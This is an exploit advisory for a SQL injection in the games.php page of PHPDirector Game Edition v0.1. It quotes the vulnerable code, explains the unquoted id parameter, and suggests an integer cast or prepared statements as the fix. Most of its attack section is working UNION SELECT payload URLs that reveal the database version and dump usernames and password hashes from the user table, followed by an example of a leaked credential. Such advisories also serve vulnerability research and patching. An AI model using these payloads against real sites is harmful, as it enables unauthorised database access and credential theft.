# Exploit Title: PHPDirector Game Edition SQL Injection Vulnerability (games.php)
# Date: 2010-01-05
# Author: Zer0 Thunder
# Site : http://www.play-online.bzh.be/forum/
# Software Link: http://www.play-online.bzh.be/forum/download/phpdirectorgameedition.zip
# Version: v0.1
# Tested on: Windows XP sp2 [WampServer 2.0i ] / LinuxBox (Ubuntu Server)
# CVE :
# Code :

Page : Games.php

Vuln Page
-----------------------------------------
if(isset($_GET['id'])) {
    $query_co = "SELECT * FROM pp_comment,pp_user WHERE pp_comment.nom = pp_user.user AND pp_comment.file_id=$_GET[id] ORDER BY pp_comment.id DESC";
    $result_co = mysql_query($query_co);
    while ($row_co = mysql_fetch_assoc($result_co)){
        $game_co[] = $row_co;
    }
    $smarty->assign('game_co', $game_co);
}
-----------------------------------

Cause : the id parameter is interpolated into the query string unquoted and without validation, so anything that follows the number is parsed as SQL.
Fix : cast the value to an integer before use (e.g. (int)$_GET['id']) or bind it as a parameter in a prepared statement (mysqli / PDO) instead of building the query by string interpolation.

Exploit :

http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Example :

DB Version
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Users
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--

########################################
#
# Note : When I ran this SQL injection, the user name and password appeared in the title bar, like so:
# Bens Videos - 1:test:098f6bcd4621d373cade4e832627b4f6
# View the page source and check the title.
# (The pass value is a 32-hex-digit digest, presumably an unsalted MD5 hash; storing a salted
# password hash, e.g. via PHP's password_hash(), would limit what such a leak exposes.)
#
########################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################